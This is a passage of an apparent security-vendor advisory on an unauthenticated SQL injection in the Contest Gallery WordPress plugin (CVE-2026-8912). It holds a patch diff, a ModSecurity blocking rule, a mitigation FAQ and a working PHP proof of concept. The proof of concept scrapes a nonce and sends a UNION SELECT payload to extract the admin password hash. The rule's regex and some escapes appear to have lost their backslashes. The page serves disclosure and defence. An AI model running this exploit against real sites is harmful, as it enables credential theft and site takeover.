-                            if ($i==2 AND ($ft=='nf' or $ft=='ef' or $ft=='se' or $ft=='ra' or $ft=='chk' or $ft=='url' or $ft=='sec' or $ft=='cb' or $ft=='fbt' or $ft=='dt')){$f_input_id = $value; continue;}
+                            if ($i==2 AND ($ft=='nf' or $ft=='ef' or $ft=='se' or $ft=='ra' or $ft=='chk' or $ft=='url' or $ft=='sec' or $ft=='cb' or $ft=='fbt' or $ft=='dt')){
+                                $f_input_id = absint($value);
+                                if(empty($f_input_id) || !isset($inputFieldContentArray[$f_input_id])){
+                                    echo "Please don't manipulate the form. Field_Type: $ft , field id manipulated";die;
+                                }
+                                continue;
+                            }

                             if ($i==3 AND ($ft=='nf' or $ft=='ef' or $ft=='se' or $ft=='ra' or $ft=='chk' or $ft=='url' or $ft=='sec' or $ft=='cb' or $ft=='fbt' or $ft=='dt')){
                                 $field_order = $value;
@@ -1127,7 +1155,12 @@

                                     // because then is not simple entry
                                     if(!$isOnlyContactEntry && !empty($attach_id)){// added 21.2.1
-                                        $WpAttachmentDetailsType = $wpdb->get_var( "SELECT WpAttachmentDetailsType FROM $tablename_form_input WHERE id = '$f_input_id'" );
+                                        $WpAttachmentDetailsType = $wpdb->get_var(
+                                            $wpdb->prepare(
+                                                "SELECT WpAttachmentDetailsType FROM $tablename_form_input WHERE id = %d",
+                                                $f_input_id
+                                            )
+                                        );
                                         if(!empty($WpAttachmentDetailsType)){// added 21.2.1
                                             if($WpAttachmentDetailsType=='alt'){
                                                 add_post_meta( $attach_id, '_wp_attachment_image_alt', $content);
@@ -1179,7 +1212,12 @@
                                     //$wpdb->insert( $tablenameentries, array( 'id' => '', 'pid' => $nextId, 'f_input_id' => $f_input_id, 'GalleryID' => $galeryID, "Field_Type" => 'text-f', 'Field_Order' => $field_order, 'Short_Text' => $content, 'Long_Text' => '') );

                                     // insert original checked field_content to show later!
-                                    $content = $wpdb->get_var("SELECT Field_Content FROM $tablename_f_input WHERE id = $f_input_id");
+                                    $content = $wpdb->get_var(
+                                        $wpdb->prepare(
+                                            "SELECT Field_Content FROM $tablename_f_input WHERE id = %d",
+                                            $f_input_id
+                                        )
+                                    );

                                     $wpdb->query( $wpdb->prepare(
                                         "
@@ -1338,7 +1376,13 @@

                             if ($i==1 AND ($ft!='nf' or $ft!='ef' or $ft!='se' or $ft!='ra' or $ft=='chk' or $ft!='url' or $ft!='sec' or $ft!='cb' or $ft!='fbt' or $ft!='dt')){$ft = $value; continue;}

-                            if ($i==2 AND ($ft=='kf' OR $ft == 'fbd')){$f_input_id = $value; continue;}
+                            if ($i==2 AND ($ft=='kf' OR $ft == 'fbd')){
+                                $f_input_id = absint($value);
+                                if(empty($f_input_id) || !isset($inputFieldContentArray[$f_input_id])){
+                                    echo "Please don't manipulate the form. Field_Type: $ft , field id manipulated";die;
+                                }
+                                continue;
+                            }

                             if ($i==3 AND ($ft=='kf' OR $ft == 'fbd')){$field_order = $value; continue;}

@@ -1383,7 +1427,12 @@
                                 // Long Entries werden eingef�gt ---- ENDE
                                 // because then is not simple entry
                                 if(!$isOnlyContactEntry && !empty($attach_id)){// added 21.2.1
-                                    $WpAttachmentDetailsType = $wpdb->get_var( "SELECT WpAttachmentDetailsType FROM $tablename_form_input WHERE id = '$f_input_id'" );
+                                    $WpAttachmentDetailsType = $wpdb->get_var(
+                                        $wpdb->prepare(
+                                            "SELECT WpAttachmentDetailsType FROM $tablename_form_input WHERE id = %d",
+                                            $f_input_id
+                                        )
+                                    );
                                     if(!empty($WpAttachmentDetailsType)){// added 21.2.1
                                         if($WpAttachmentDetailsType=='alt'){
                                             add_post_meta( $attach_id, '_wp_attachment_image_alt', $content);
@@ -1902,4 +1951,4 @@
 }


-?>
 No newline at end of file
+?>

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20268912,phase:2,deny,status:403,chain,msg:'CVE-2026-8912 - Contest Gallery SQL Injection via AJAX',severity:'CRITICAL',tag:'CVE-2026-8912'"
  SecRule ARGS_POST:action "@streq post_cg_gallery_form_upload" "chain"
    SecRule ARGS_POST:form_input "@rx bUNIONb.*bSELECTb" "t:urlDecode,t:removeWhitespace"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-8912 - Contest Gallery <= 28.1.6 - Unauthenticated SQL Injection

// WARNING: For authorized testing only.
set_time_limit(60);

// Configuration
$target_url = 'https://example.com'; // CHANGE THIS

// Step 1: Fetch a public gallery page to extract the nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/?cg1l_action=post_cg_gallery_form_upload');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cg_cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cg_cookie.txt');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
    die("[-] Failed to fetch target page. HTTP code: $http_coden");
}

// Extract nonce from HTML (typically in a hidden field or script)
preg_match('/name="cg_nonce" value="([a-f0-9]+)"/i', $response, $matches);
if (!isset($matches[1])) {
    preg_match('/cg_nonce.*?"([a-f0-9]+)"/i', $response, $matches);
}
if (!isset($matches[1])) {
    die("[-] Could not extract nonce. Response may not contain a public gallery or nonce retrieval needs adjustment.n");
}
$nonce = $matches[1];
echo "[+] Extracted nonce: $noncen";

// Step 2: Craft SQL injection payload
// The injection point is in the f_input_id parameter processed by users-upload-check.php
// We send a malicious form_input that contains a UNION SELECT to extract admin hashes
$sql_payload = "1 UNION SELECT user_pass FROM wp_users WHERE ID=1-- -";

// Build POST data mimicking the upload form POST
$post_data = array(
    'action' => 'post_cg_gallery_form_upload',
    'cg_nonce' => $nonce,
    'galeryIDuser' => '1', // Typically numeric
    'form_input' => json_encode(array(
        array('', 'cb', $sql_payload),
        // Other legitimate form fields can be added here if needed
    )),
);

// Step 3: Send the exploit request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cg_cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cg_cookie.txt');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] Exploit response:n";
echo $response;
?>

Frequently Asked Questions

What is CVE-2026-8912?
Overview of the vulnerability
CVE-2026-8912 is a high-severity SQL injection vulnerability found in the Contest Gallery plugin for WordPress, affecting versions up to and including 28.1.6. It allows unauthenticated attackers to exploit the ‘form_input’ parameter in AJAX requests to manipulate SQL queries and potentially extract sensitive information from the database.
How does this vulnerability work?
Mechanics of the SQL injection
The vulnerability arises from insufficient input sanitization in the ‘post_cg_gallery_form_upload’ AJAX action. User-supplied input is directly concatenated into SQL queries without proper escaping, allowing attackers to inject malicious SQL code through the ‘form_input’ parameter.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Contest Gallery plugin version 28.1.6 or earlier is at risk. Administrators can check their plugin version in the WordPress dashboard under the ‘Plugins’ section.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the Contest Gallery plugin installed. If it is 28.1.6 or earlier, your site is susceptible to CVE-2026-8912.
What is the recommended fix for this vulnerability?
Updating the plugin
The immediate fix is to update the Contest Gallery plugin to version 28.1.7 or later, where the vulnerability has been patched. This version includes input validation and sanitization improvements to prevent SQL injection.
What are the risks associated with this vulnerability?
Potential impact of exploitation
If exploited, this vulnerability allows attackers to execute arbitrary SQL queries, potentially leading to the extraction of sensitive data such as user credentials and personal information. In severe cases, it could result in complete site compromise.
What does a CVSS score of 7.5 mean?
Understanding severity ratings
A CVSS score of 7.5 indicates that the vulnerability is classified as high severity. This means it poses a significant risk to affected systems, and immediate action is recommended to mitigate potential exploitation.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an attacker can send a crafted POST request to the vulnerable AJAX endpoint, manipulating the ‘form_input’ parameter to inject SQL commands. This demonstrates the ease with which an attacker can exploit the vulnerability to extract database information.
What additional measures can I take to secure my site?
Beyond updating the plugin
In addition to updating the plugin, consider implementing web application firewalls (WAFs), regularly monitoring logs for suspicious activity, and performing security audits on all installed plugins to ensure they are up to date and secure.
Is the nonce protection effective against this vulnerability?
Role of nonce in security
The nonce used in the AJAX request does not provide effective protection against this vulnerability, as it is publicly accessible in the page source. Attackers can still exploit the SQL injection regardless of nonce validation.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Contest Gallery plugin temporarily to prevent exploitation. Additionally, review server logs for any unusual activity and restrict access to the affected AJAX endpoint.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-8912 can be found on the official CVE database, security advisories from WordPress, and community discussions on security forums. Staying informed through these resources can help you maintain better security practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations